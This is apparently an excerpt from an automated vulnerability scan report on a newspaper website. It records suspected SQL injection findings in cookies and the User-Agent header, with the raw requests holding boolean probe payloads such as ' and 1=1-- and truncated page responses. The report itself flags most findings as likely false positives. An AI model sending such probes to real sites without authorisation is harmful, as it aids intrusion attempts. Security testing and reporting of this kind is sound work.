Request 1

GET /ci_16791142 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:39:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:39:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:39:29 GMT
Set-Cookie: JSESSIONID=ALISDGBW05WY4CUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 69535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gift-wrapping falls out of favor to gift bags and greener times'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Ghost of Christmas past - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNG
...[SNIP]...

Request 2

GET /ci_16791142 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:39:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:39:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0IVUTJH1NV4OYCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 69535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gift-wrapping falls out of favor to gift bags and greener times'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Ghost of Christmas past - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatimes.com";
   MNGiIDCookieName = "MN
...[SNIP]...

1.139. http://www.contracostatimes.com/ci_16792343 [currBrandCheck cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16792343

Issue detail

The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 (a condition that is always true and one that is always false) were each appended to the cookie's normal value, mngicctimes. The scanner judged the two responses to be different and takes that as a sign that the value reaches a SQL query without escaping.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. In the pair recorded below both responses are 200 OK with the same Content-Length (61721); the visible differences are the Date/Expires timestamps and the Set-Cookie headers (a fresh JSESSIONID on each response, plus EMETA_NCLICK_MNGI=3 on Response 1 only, the same pattern every pair on this page shows), which is per-request state rather than anything that tracks the truth of the injected condition. The payload is also sent percent-encoded inside the Cookie header, where it is not URL-decoded unless the application does so itself, so the database would see the literal %20 sequences. Manually review the requests and responses, ideally with a decoded payload and several true/false pairs, before treating this as a confirmed vulnerability.

Request 1

GET /ci_16792343?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes'%20and%201%3d1--%20; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:47:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:47:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:47:01 GMT
Set-Cookie: JSESSIONID=HOVL5CAX1C3Z2CUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><scri
...[SNIP]...

Request 2

GET /ci_16792343?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes'%20and%201%3d2--%20; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:47:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:47:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=TGAIYGZP4PP1ACUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61721

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https:/
...[SNIP]...

1.140. http://www.contracostatimes.com/ci_16792616 [u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16792616

Issue detail

The u cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each appended to the cookie's value, which is itself a percent-encoded list of key/value pairs (COOKIE_NAME%3Du%3BuserIdChange%3Dtrue...) ending in %3B. The scanner judged the two responses to be different and infers from that difference that the value reaches a SQL query without escaping.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. In the pair recorded below both responses are 200 OK with the same Content-Length (65415), and the visible differences are confined to the Date/Expires timestamps and the Set-Cookie headers (a fresh JSESSIONID each time, and EMETA_NCLICK_MNGI=3 on Response 1 only). Because the application evidently URL-decodes this cookie before parsing it, the decoded payload would arrive as a single quote followed by " and 1=1-- ", so a manual retest with a true/false pair that produces a content difference is the check that would confirm or dismiss this finding.

Request 1

GET /ci_16792616?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B'%20and%201%3d1--%20; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:49:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:49:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:49:50 GMT
Set-Cookie: JSESSIONID=3LYV5JNFYXOO2CUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 65415

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where he&#27;ll introduce wealthy tech figures to nonprofit groups exploring such ideas as artificial intelligence, extending human life and building communities on the high seas.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Silicon Valley billionaire backs futuristic philanthropy - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "
...[SNIP]...

Request 2

GET /ci_16792616?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B'%20and%201%3d2--%20; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:49:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:49:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=MZTZRRTLPS3HSCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 65415

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where he&#27;ll introduce wealthy tech figures to nonprofit groups exploring such ideas as artificial intelligence, extending human life and building communities on the high seas.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Silicon Valley billionaire backs futuristic philanthropy - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/
...[SNIP]...

1.141. http://www.contracostatimes.com/news/ci_16783847 [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /news/ci_16783847

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10497043'%20or%201%3d1--%20 and 10497043'%20or%201%3d2--%20 were each appended to the normal User-Agent string. The scanner judged the two responses to be different and infers from that difference that the header value reaches a SQL query without escaping; for that to be possible the application would have to store or look up the User-Agent in the database, for example for logging or analytics.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. In the pair recorded below both responses are 200 OK with the same Content-Length (66737); the only visible differences are the Date/Expires timestamps and the Set-Cookie headers (a fresh JSESSIONID on each response, EMETA_NCLICK_MNGI=3 on Response 1 only). The payload is sent percent-encoded inside a request header, which the server does not URL-decode, so the literal %20 sequences would reach any query unchanged. Manually review the requests and responses, with a decoded payload, before treating this as a confirmed vulnerability.

Request 1

GET /news/ci_16783847?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10497043'%20or%201%3d1--%20
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:53:23 GMT
Set-Cookie: JSESSIONID=OG3AP1HCGKI5UCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The red- and green-dressed festive drinkers are participating in SantaCon, an annual national event involving people dressing up in Santa costumes and taking to the streets, which in San Francisco began in 1994.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Hundreds don red suits for SantaCon in San Francisco - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get pr
...[SNIP]...

Request 2

GET /news/ci_16783847?source=rss&nclick_check=1 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10497043'%20or%201%3d2--%20
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:53:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=CRHSLFYTFE1MUCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 66737

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The red- and green-dressed festive drinkers are participating in SantaCon, an annual national event involving people dressing up in Santa costumes and taking to the streets, which in San Francisco began in 1994.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Hundreds don red suits for SantaCon in San Francisco - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.News.Front";
   var CM8Profile="";
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistration
...[SNIP]...

1.142. http://www.contracostatimes.com/news/ci_16791147 [EMETA_COOKIE_CHECK_MNGI cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /news/ci_16791147

Issue detail

The EMETA_COOKIE_CHECK_MNGI cookie appears to be vulnerable to SQL injection attacks. The payloads 17543039%20or%201%3d1--%20 and 17543039%20or%201%3d2--%20 were each appended to the cookie's normal value of 1, so the cookie was sent as 117543039%20or%201%3d1--%20 and 117543039%20or%201%3d2--%20; unlike the quoted payloads used elsewhere in this report, these test for a numeric (unquoted) context. The scanner judged the two responses to be different and infers from that difference that the value reaches a SQL query unescaped.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. In the pair recorded below both responses are 200 OK with the same Content-Length (73336), and the visible differences are the Date/Expires timestamps and the Set-Cookie headers (a fresh JSESSIONID on each, EMETA_NCLICK_MNGI=3 on Response 1 only). The payload is percent-encoded inside the Cookie header and would reach the application with the literal %20 sequences unless it decodes cookie values itself. Manually review the requests and responses before treating this as a confirmed vulnerability.

Request 1

